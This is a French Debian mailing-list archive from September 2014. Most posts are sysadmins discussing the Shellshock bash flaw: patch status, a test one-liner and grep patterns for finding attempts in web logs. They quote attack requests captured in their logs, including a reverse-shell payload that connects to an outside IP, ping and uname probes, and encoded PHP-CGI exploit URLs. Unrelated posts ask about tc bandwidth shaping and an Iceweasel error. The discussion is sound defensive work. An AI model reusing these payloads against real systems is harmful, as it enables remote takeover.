Le 26 sept. 14 à 16:45, David Guyot a écrit : Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a écrit : Ah ? Si tu gères des serveurs web je te propose de faire un simple cat fichier log serveur web|grep () { et de compter le nombre de tentatives d'accès comme par exemple 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 345 - () { :;}; /bin/ ping -c 1 198.101.206.138 ou encore 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] GET / HTTP/1.0 200 961 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.101/ 01' J'en ai aussi, mais pas autant que des exploits classiques sur des CMS vérolés. Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la tête avec. D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le second exemple de logs sur un de mes serveurs, ce qui correspond à une tentative d'implantation de porte dérobée — https://securelist.com/blog/research/66719/shellshock-and-its-early- adopters/ Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La publication de la faille va sûrement précipiter un paquets de gonziers à l'essayer un peu partout… Cordialement. -- David Guyot Administrateur système, réseau et télécom / Sysadmin Europe Camions Interactive / Stockway Moulin Collot F-88500 Ambacourt 03 29 30 47 85 -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/80dbf6e3-42d7-4a04-be65-cc98c62ef...@worldonline.fr
Re: Linux et Unix affectés par une faille critique dans Bash
Philippe Gras wrote on Fri, Sep 26, 2014 at 05:32:58PM +0200 Le 26 sept. 14 à 16:45, David Guyot a écrit : Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a écrit : Ah ? Si tu gères des serveurs web je te propose de faire un simple cat fichier log serveur web|grep () { et de compter le nombre de tentatives d'accès comme par exemple 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 345 - () { :;}; /bin/ping -c 1 198.101.206.138 ou encore 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] GET / HTTP/1.0 200 961 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.101/ 01' J'en ai aussi, mais pas autant que des exploits classiques sur des CMS vérolés. Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la tête avec. D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le second exemple de logs sur un de mes serveurs, ce qui correspond à une tentative d'implantation de porte dérobée — https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/ Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La publication de la faille va sûrement précipiter un paquets de gonziers à l'essayer un peu partout… En effet, j'ai 2 trucs du même genre depuis hier justement, alors que mes logs remontent assez loin. Dominique -- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926163921.ga29...@telecom-paristech.fr
Conseils sur l'utilisation de tc (traffic control)
Bonjour, Voici le schema logique de mon installation (pour une résidence hôtelière): Modem xDSL --- xN --- Routeur Wheezy ---xM--- Points d'accès WiFi ---xP--- PC, Smartphones J'ai 5 à 7 modems ADSL (soit 50Mb/s de download théorique), 20 à 30 points d'accès WiFi et 100 utilisateurs instantanés. Le serveur DHCP qui fournit les adresses IP aux terminaux WiFi est localisé sur la machine sous Wheezy (core i3) qui fait office de routeur. Il peut fournir (de mémoire) 2000 adresses distinctes. J'ai le contrôle du serveur Wheezy. Les modems sont des Livebox v2. Je n'ai aucun contrôle sur les terminaux des utilisateurs et a fortiori sur les applications qu'ils utilisent. Je souhaite répartir répartir équitablement la bande passante entre les utilisateurs de sorte qu'un utilisateur ne pénalise pas les autres quand il utilise le réseau. J'en suis au stade de la conception et je n'ai rien encore implémenté. Voici mes questions: 1. En lisant la doc de LARTC [1], il ne m'a pas semble possible de faire quelque chose comme: vous êtes 20 utilisateurs actifs, je partage la bande passante en 20. Vous êtes 100 je la partage en 100. Autant la notion d'utilisateur actif me semble avoir du sens pour un contrôleur WiFi, autant elle me semble difficile à définir pour un routeur donc je pense me résoudre à calibrer une fois pour toute la limite de bande passante selon des conditions typiques et tant pis pour ceux qui surfent le 4 août à 3h du matin. Qu'en pensez-vous ? 2. J'imagine contrôler la bande passante dans les 2 deux sens car j'ai constaté que certains utilisateurs avaient un upload très important [1]. Pourtant, comme je ne maîtrise l'ordre d'arrivée des données en provenance du Net, je me demande ce qu'il est utile de faire. Limiter l'upload ? Le download ? Les deux ? 3. Comme basiquement le serveur DHCP limite le nombre d'utilisateurs, je me demande si, pour faire un contrôle par utilisateur, je ne vais pas faire un contrôle par IP du terminal WiFi: un terminal WiFi aura toujours la même IP, même si les terminaux tournent (un utilisateur change de terminal, ou un utilisateur en remplace un autre), différencier selon l'IP du terminal me parait nécessaire et suffisant. En conséquence, j'anticipe que j'aurai à produire un fichier de config autant de règles tc que d'IP potentielle. Qu'en pensez-vous ? 4. Avez-vous des liens ou des retours d'expérience à partager sur ce sujet ? Slts [1] http://www.inetdoc.net/guides/lartc/ [2] Je ne donne pas de chiffre absolu car je ne connais pas bien les outils qui produisent ces chiffres; par contre, en comparant les uns et aux autres, certains utilisateurs ont un upload spectaculaire et j'ai peur que celui-ci pénalise les requêtes des autres utilisateurs. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/CAPeT9jjJUC0JYych4BeE=ia+vxl7swzwe0rvzepsoscmg3n...@mail.gmail.com
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 11:16, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello Quid ? André C'est parfait car c'est patché ! linuxement vôtre, David P -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425b1c2.7060...@free.fr
Re : Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 20:34:42, David Pinson a écrit : C'est parfait car c'est patché ! J’ai mis à jour ce matin et pas redémarré mes sessions. J’ai la même sortie. nicolas patrois : pts noir asocial -- RÉALISME M : Qu'est-ce qu'il nous faudrait pour qu'on nous considère comme des humains ? Un cerveau plus gros ? P : Non... Une carte bleue suffirait... -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/1411757246.12219...@new-host-2.home
Re: Linux et Unix affectés par une faille critique dans Bash
pendant ce temps ca scanne sévère: () { :;}; /bin/bash -c \echo testing9123123\; /bin/uname -a je vois ça sur mon site de production. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425d216.1050...@freeatome.com
Re: Linux et Unix affectés par une faille critique dans Bash
Zut ! ~# env X=() { :;} ; echo busted /bin/sh -c echo completed busted completed ~# env X=() { :;} ; echo busted `which bash` -c echo completed busted completed Par contre dans mes logs, je n'ai que des trucs comme ça : 142.4.195.183 - - [26/Sep/2014:00:59:39 +0200] POST /cgi-bin/php/%63% 67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73% 75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+ %2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F %72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D% 6E HTTP/1.1 403 168 - - 46.165.221.166 - - [26/Sep/2014:00:59:40 +0200] POST /cgi-bin/php/% 63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+% 73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E% 65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63% 65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+ %2D%6E HTTP/1.1 403 168 - - Le 26 sept. 14 à 22:52, admini a écrit : pendant ce temps ca scanne sévère: () { :;}; /bin/bash -c \echo testing9123123\; /bin/uname -a je vois ça sur mon site de production. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425d216.1050...@freeatome.com -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/943686b7-8d7e-4ec9-a856-edb517ee0...@worldonline.fr
Après upgrade, Iceweasel ne se lance plus
Après un upgrage de Wheezy, suite au correctif de bash, Iceweasel ne se lance plus : $ iceweasel Error: Platform version '17.0.10' is not compatible with minVersion = 17.0.9 maxVersion = 17.0.9 La version 17.0.10 ne semble pas acceptée. Merci d'un conseil. André -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/201409262347.30514.andre_deb...@numericable.fr
Re: Linux et Unix affectés par une faille critique dans Bash
On 2014-09-26 16:38:00 +0200, daniel huhardeaux wrote: Ah ? Si tu gères des serveurs web je te propose de faire un simple cat fichier log serveur web|grep () { et de compter le nombre de tentatives d'accès comme par exemple Et même: grep '() *{' J'en ai eu 3 le 25 septembre. Et comme j'ai conservé mes logs depuis 11 ans, j'en ai profité pour vérifier dans tous les logs passés (au cas où quelqu'un aurait été au courant et ne l'aurait dit à personne) et je n'ai pas trouvé de telle requête. La NSA ne devait pas être au courant. :) -- Vincent Lefèvre vinc...@vinc17.net - Web: https://www.vinc17.net/ 100% accessible validated (X)HTML - Blog: https://www.vinc17.net/blog/ Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926223730.ga14...@xvii.vinc17.org
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 20:34, David Pinson a écrit : Le 26/09/2014 11:16, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello Quid ? André C'est parfait car c'est patché ! linuxement vôtre, Pas tout à fait, il y a eu deux patch successifs, le premier n'ayant pas complètement corrigé le trou de sécurité. Si tu as une erreur de Bash, c'est qu'il n'y a que le premier patch d'appliqué, avec les deux patch tu n'aurais que le message hello. Pour testing, la version de Bash avec le deuxième patch était encore ce matin dans SID. N'oubliez pas le chemin de SID vers testing en cas de pépin de sécurité est de deux jours. Si vous souhaitez des rustines plus rapides il faut utiliser SID ou la version stable de Debian. -- == | FRÉDÉRIC MASSOT | | http://www.juliana-multimedia.com | | mailto:frede...@juliana-multimedia.com | | +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 | ===Debian=GNU/Linux=== -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425f4ac.3090...@juliana-multimedia.com